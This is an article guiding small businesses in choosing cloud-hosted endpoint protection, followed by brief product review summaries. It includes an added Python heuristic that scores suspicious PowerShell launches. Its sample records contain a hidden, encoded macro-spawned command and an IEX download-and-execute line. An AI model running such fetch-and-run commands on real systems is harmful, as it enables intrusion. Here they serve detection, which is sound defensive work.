Nothing in IT changes more quickly or demands more sophistication than effective network and data security. That’s hard enough for enterprises that can afford specialist staffers, and harder still for budget-conscious small to midsize businesses (SMBs), even though those organizations face the same security challenges as their larger counterparts. Although precise estimates vary, somewhere around half of all security incidents affect organizations with fewer than 1,000 employees. Sure, data breaches at the IRS and Target are what make the news, but it’s important to remember that the threats to SMBs are very real and just as common, even if staggering dollar figures aren’t always involved.
In many cases, an SMB’s IT administrator faces the same threats that whole teams of his or her enterprise counterparts face, except that he or she is likely to face them alone while dealing with 20 completely unrelated issues at the same time. This makes designing a security solution for an SMB audience a difficult balancing act between ease of use and state-of-the-art protection.
Small fish still make a big target, though. In a Visa and National Cyber Security Alliance (NCSA) survey of 1,000 small business owners, 85 percent of respondents believed that enterprises are more targeted than they are, yet another survey by the same group found that 20 percent of small businesses suffered a data breach in 2013.
So, as long as your data holds value, criminals don’t care how big your company is. Data that holds value includes employee and customer personal and banking information, sensitive corporate intellectual property (IP), sales and product information, and company financial information such as payroll data. There’s also another angle: Criminals can use the systems of a small business to exploit trust relationships with larger businesses. If this is the case, then the small business is held responsible for the damages done.
In fact, some hackers actively target small businesses precisely because they’re small. Since they don’t have the resources necessary to adequately shield against intrusion, they’re the low-hanging fruit, and many carry information just as valuable as that of larger organizations, especially in aggregate. It takes less effort to steal financial data and act on it. Furthermore, because no defenses are in place, the attacks are extremely difficult, if not impossible, to trace: without enough logged data, a typical forensics process has nothing to work with.
Small But With High Stakes
Obviously, the stakes are high in SMB security. Therefore, selecting hosted endpoint protection and security software is a critical decision for IT admins of SMBs. In many ways, you’re choosing a partner that is going to help you secure servers, desktops, laptops, and mobile devices. This is likely to be a long-term partnership because you don’t want to evaluate software solutions, roll one out, remove it, re-evaluate, and re-deploy. So, look for someone who has a track record of combating threats by evolving, refining, and adding new protection tech as applicable.
This partnership is solidified when you choose a Software-as-a-Service (SaaS) package instead of an on-premises package because, instead of buying software that you run yourself, you’ll have daily interactions with software that’s administered and updated by your vendor. SaaS, or cloud-based, hosted endpoint protection and security software has the advantage of reducing the complexity required by its on-premises predecessors, which typically run on dedicated servers. It saves you a great deal of time and effort that would otherwise have gone into hardening and patching the underlying server operating system (OS) and patching the management console and its underlying infrastructure. This is not to say that there isn’t significant value in keeping your environment patched. Endpoint protection is typically the last line of defense; it’s better to limit exposure to threats in the first place, and one of the best ways to do that, bar none, is to keep up to date on your patch management chores.
Cloud-based services can also be managed outside the office, meaning that admins can manage their endpoint protection on the road or from branch offices by using multiple kinds of internet-connected devices, without loss of function or security. That’s possible to do when the management server is run on-premises but usually with significantly increased difficulty. In many cases, a hosted management console can be easily accessed and used from a mobile device. As an SMB security admin, imagine getting an email alert on your phone that the business owner has encountered malware, and then being able to log in to the management console from your phone’s browser and initiate remediation activities.
Another important advantage is that SaaS software solutions provide protections and updates to devices that are off the corporate network. When your co-workers take their laptops on the road with them, they continue to be protected and you retain the ability to monitor and manage their devices. Previously, once a laptop left the office, a security admin might have had to wait until it returned (or was connected via a virtual private network or VPN) to assess its security status, push updates, adjust policy, or remediate threats. In some cases, this actually extends beyond the endpoint protection software and includes things such as being able to patch the OS and related software remotely. As mentioned earlier, this can have just as big of an impact, if not a bigger one, than simply ensuring that the threat database is current.
Many SMBs’ employees rely heavily on mobile devices to do their jobs. This means that mobile platforms represent as rich a target to hackers and malware as office-based systems. Many businesses overlook mobile device security, leaving this data-rich target unprotected or entirely in the hands of employees who may or may not deploy consumer-grade protections.
Security vendors are responding to these threats and have added protections for Android and iOS tablets and smartphones. Make sure to ask endpoint protection software solution providers if mobile is included (or at least available) and can be managed through the same hosted user interface (UI). You’ll find richer security support for Android than for iOS. Much to the chagrin of customers, Apple selfishly continues to push its marketing agenda that iOS devices are safe from malware and refuses to work with security vendors. Vendors offer to manage devices (e.g., locate and remote wipe) and security policy (e.g., password strength, application control, and Wi-Fi settings) for Android and iOS, while offering full security software (e.g., anti-malware app scanning, firewall, and intrusion prevention) only for Android. That doesn’t mean that iOS can’t support useful security software, because it can, just with a few more hoops than Android. However, VPN and safe-browsing features are already included in most implementations of iOS, so there may be less need for third-party solutions.
Evaluating the Software
Picking the right hosted endpoint protection and security software solution is an important decision for an SMB. Choosing the wrong product could create a false sense of security amongst users and management, and a management nightmare for admins. Products that are needlessly complex are fine for enterprise security admins who live and breathe inside a management console. But you don’t want to waste an SMB security admin’s time and effort, two things that are not in overabundance in any SMB.
For this reason, and because there are significant differences between them, management consoles should be a critical decision-making factor when selecting a hosted endpoint protection and security software solution for your SMB. The best management consoles are uncluttered, intuitive, and have context-sensitive Help waiting in the wings. Dashboards should provide a thorough assessment of company-wide security status and, when something is wrong, provide a quick and easy way to dive deeper, assess the issue, and resolve it. Reports should be helpful and informative whether they are active or passive or both. Policies should be preconfigured using best practices, with the ability to quickly and easily make changes should the admin desire.
For a busy SMB security admin, alerts and notifications can be critical time-savers. Some may choose to stay logged in to a hosted endpoint protection and security software solution, occasionally glancing at dashboards and interactive reports. Others may deploy their agents and then move on to other matters, depending upon notifications and scheduled reports to keep them up to date on the security of users and devices. If this is the case, then pay particular attention to the number of possible notifications (e.g., malware detected, web content policy violated, and potential malicious URLs visited) and the capabilities of the product to manage (e.g., set thresholds and escalations) the alerts.
For traveling employees, it’s also good to look for extras. Some software will include a VPN that will allow secure browsing from coffee shops or when traveling out of the country. This is great for protecting against man-in-the-middle attacks where an attacker will intercept information as it’s being transmitted across the web. Other handy tools, such as password management software and data shredders, are also not uncommon.
New Demands of Data Safety
Ransomware has been a major cause of concern over the past year and that’s likely to continue in the foreseeable future. Detecting it is a top priority, but the race between hackers and security professionals will always be a close one. When hackers lead the race, it’s important to know how to get that data back. Part of what today’s endpoint protection solutions should offer is a way to roll back changes that malicious software, such as ransomware, performs on your system. While everyone hopes that their favorite product will win, making sure your data is preserved takes precedence.
Digital theft also doesn’t have to take place over the internet. A good old-fashioned hammer still works on a car window. If a thief runs off with your laptop, then having its data encrypted is the key to not having the incident come back to haunt you later. Typically, once a physical machine is compromised, there is little that can be done to stop an intruder. But encryption is one of the few methods that’s not only been proven to work but is also cheap and easy to implement. Some endpoint protection products offer encryption management right on their dashboards. For the forgetful road warrior, this can be a life-saver in the event of a scenario such as the one described earlier. Admins should look for management capabilities in this regard as well; for example, that encryption can be enforced as a policy as opposed to being implemented on a device-by-device basis.
In the wake of the recent Equifax breach, it’s more important than ever that endpoint protection software include additional barriers beyond simple antivirus, anti-malware, and anti-phishing software. Even firewalls only partially do the job. A platform that combines all of these capabilities as a cohesive and well-managed whole is what you should be looking for. Intrusion Detection Systems (IDS) are also sorely needed at the small business level, but it has been challenging to afford or understand IDS outside of larger enterprises. This is partially due to a dearth of SMB-oriented software and partially due to a skills gap between SMB and enterprise IT security professionals. SaaS solutions, such as the ones reviewed here, can go a long way toward leveling the playing field.
In addition, certain vulnerabilities are under-served. For example, PowerShell, Microsoft’s vision for how the command line should work now and in the future, has been used in a number of new ransomware variants. This is predominantly for convenience and because PowerShell commands tend to be treated as automatically legitimate. While many enterprises lock down these types of apps for users, small businesses tend to leave them wide open, either because power users require them or because the business is unaware of the risk.
This issue is not just limited to PowerShell, however. Threats that stem from the still-popular Visual Basic for Applications (VBA) also often slip through security nets, mainly because macros are so widely used in small business circles as cheap customization and workflow solutions. What makes these types of threats extra dangerous is that they pose as simple Microsoft Word or Microsoft Excel documents. Because macros using VBA are so common, they can easily be passed off as legitimate, letting an attacker compromise, and potentially take full control of, a victim’s machine.
New Tech for an Old Problem
The challenge, then, is to select a product that can fend off known threats as well as detect odd behavior that hasn’t been seen before. To help, quite a few endpoint protection products have introduced a form of machine learning (ML) to their anti-malware engines. A sizeable portion of them are also able to detect the style of threats that would be seen during a direct cyberattack, which can more quickly point to a source and a solution.
As a bonus, this same tech can sometimes pick up script-based attacks that have, in the past, gone mostly undetected. This will hopefully put a dent in the successful deployments of ransomware and other data-gathering attacks. As malware and ransomware writers are veering more toward this style of engagement, it’s become a major factor in what will truly add security to a small business. Unfortunately, malware scanners aren’t always sensitive enough to pick up these threats by using just their default settings and increasing the aggressiveness sometimes has a performance impact on users. Finding the right balance can often be a challenge and may result in some dissatisfied users in the short term. But you need to weigh that carefully against the cost of compromised systems and data.
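The script-based activity described in the PowerShell and VBA sections above (a macro-launched interpreter, hidden or encoded commands) is the kind of behaviour that a scanner has to weigh against the legitimate scripts admins and developers run every day. The following Python scorer is an added example, not code from the article or from any product it reviews: it works over constructed process-creation records in a simplified key=value shape, and the record format, indicator weights, hostnames, paths and the base64 placeholder are all this example's own assumptions. It is a plain heuristic, not the machine-learning engines the text mentions, but it shows the sensitivity trade-off concretely: at the default threshold only the two Office-spawned launches are flagged, while lowering it also flags a developer's build script on DEV-03, which an admin would then have to review.

```python
"""Heuristic triage of script-host launches over constructed telemetry (added example)."""
import re
from dataclasses import dataclass

# Constructed process-creation records (hostnames, paths and the base64 blob are
# made up; the key=value layout is this example's own, not a real product's log).
SAMPLE_LOG = [
    "host=FINANCE-01 parent=explorer.exe image=powershell.exe "
    "cmdline=powershell.exe -NoProfile -File C:\\Scripts\\backup-report.ps1",
    "host=SALES-07 parent=WINWORD.EXE image=powershell.exe "
    "cmdline=powershell.exe -w hidden -nop -ep bypass -enc QUJDREVGR0g=",
    "host=HR-02 parent=EXCEL.EXE image=powershell.exe "
    "cmdline=powershell.exe -NoProfile -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage')\"",
    "host=DEV-03 parent=cmd.exe image=powershell.exe "
    "cmdline=powershell.exe -ExecutionPolicy Bypass -File C:\\Build\\deploy.ps1",
    "host=RECEPTION-01 parent=explorer.exe image=notepad.exe "
    "cmdline=notepad.exe C:\\Users\\pat\\notes.txt",
]

RECORD = re.compile(r"^host=(\S+) parent=(\S+) image=(\S+) cmdline=(.*)$")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# (pattern on the command line, weight, reason). Weights are assumptions chosen
# for this example; a real product would tune them against its own telemetry.
INDICATORS = [
    (r"(^|\s)-e(c|nc|ncodedcommand)?(\s|$)", 3, "base64-encoded command"),
    (r"(^|\s)-w(indowstyle)?\s+hidden\b", 2, "hidden window"),
    (r"(^|\s)-e(p|x|xec|xecutionpolicy)\s+(bypass|unrestricted)\b", 2,
     "execution policy bypass"),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", 2,
     "web download cradle"),
    (r"\biex\b|invoke-expression", 2, "dynamic code invocation"),
    (r"(^|\s)-nop(rofile)?(\s|$)", 1, "profile suppressed"),
]


@dataclass
class Finding:
    host: str
    score: int
    reasons: list
    cmdline: str


def score_event(line):
    """Score one record; return None for malformed lines or non-script images."""
    m = RECORD.match(line)
    if not m:
        return None
    host, parent, image, cmdline = m.groups()
    if image.lower() not in SCRIPT_HOSTS:
        return None
    score, reasons = 0, []
    # A script interpreter whose parent is an Office application is the
    # macro-to-PowerShell chain described in the article.
    if parent.lower() in OFFICE_APPS:
        score += 3
        reasons.append(f"script host spawned by {parent} (macro-style launch)")
    for pattern, weight, reason in INDICATORS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            score += weight
            reasons.append(reason)
    return Finding(host, score, reasons, cmdline)


def triage(lines, threshold=4):
    """Return findings at or above the threshold, highest score first.
    A lower threshold is more sensitive but flags more routine admin and
    developer activity, which is the tuning trade-off the article describes."""
    findings = [f for f in map(score_event, lines) if f is not None]
    return sorted((f for f in findings if f.score >= threshold),
                  key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for t in (4, 2):
        print(f"threshold={t}")
        for f in triage(SAMPLE_LOG, t):
            print(f"  {f.host:12} score={f.score:2} {'; '.join(f.reasons)}")
```

Run as a script it prints the flagged hosts at both thresholds; the default of 4 surfaces SALES-07 and HR-02 only, while 2 adds DEV-03. The point of the weighted list rather than a single "PowerShell ran" rule is that each indicator on its own is common in legitimate use, so a product that fires on any one of them is the kind of over-aggressive setting that produces dissatisfied users.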
At the end of the day, it becomes a question of, “What’s good enough?” The answer will vary from customer to customer depending on specific needs, custom processes, and risk factors. However, one thing is clear: The internet is an ocean of dangerous waters and those waters are only getting deeper. Having an adequate defense isn’t just important, it’s critical.
Bitdefender GravityZone Elite Review
Bottom Line: Bitdefender GravityZone Elite succeeded where the others did not, by stopping a direct attack in a simulated real-world environment. The reporting capabilities and configurability are top-no…
ESET Endpoint Protection Standard Review
Bottom Line: ESET Endpoint Protection Standard is powerful, easy to use, and comes at a good price. While it lags a bit in detecting phishing websites, it excels at detecting exploits locally and from th…
Symantec Endpoint Protection Cloud Review
Bottom Line: Symantec Endpoint Protection Cloud is an excellent security product but comes up short in a few annoying ways. It’s missing antiphishing capabilities and lacks a well-rounded reporting featu…
Kaspersky Endpoint Security Cloud Review
Bottom Line: Kaspersky Endpoint Security Cloud excels at protecting systems, but doesn’t do so well at capitalizing on their cloud management console. While serviceable, this endpoint protection system …
Panda Security Endpoint Protection Review
Bottom Line: As a malware detection and prevention platform, Panda Security Endpoint Protection performs well. However, against active attackers, it lacks some of the basic defenses that are in place in …
GFI LanGuard Review
Bottom Line: GFI LanGuard is a powerful and intuitive network security scanner, vulnerability assessment and patch management tool with a great workflow-driven interface. However, outstanding reporting i…
Bottom Line: Exabeam is an enterprise security software package that’s designed to ferret out security risks and attacks by watching user behavior.
Sophos Cloud Endpoint Protection Review
Bottom Line: SaaS endpoint protection software solution Sophos Cloud Endpoint Protection combines an outstanding management console with good protection scores in our lab tests. Server lockdown, user-bas…
AVG CloudCare Review
Bottom Line: AVG CloudCare is a value-priced, easy-to-deploy and administer, cloud-based endpoint protection solution. It offers good protection, but lacks some required business features for larger orga…
Kaspersky Small Office Security Review
Bottom Line: Kaspersky Small Office Security is an extremely basic web management console tacked onto Kaspersky’s consumer product. It lacks many of the features businesses require and will only appeal t…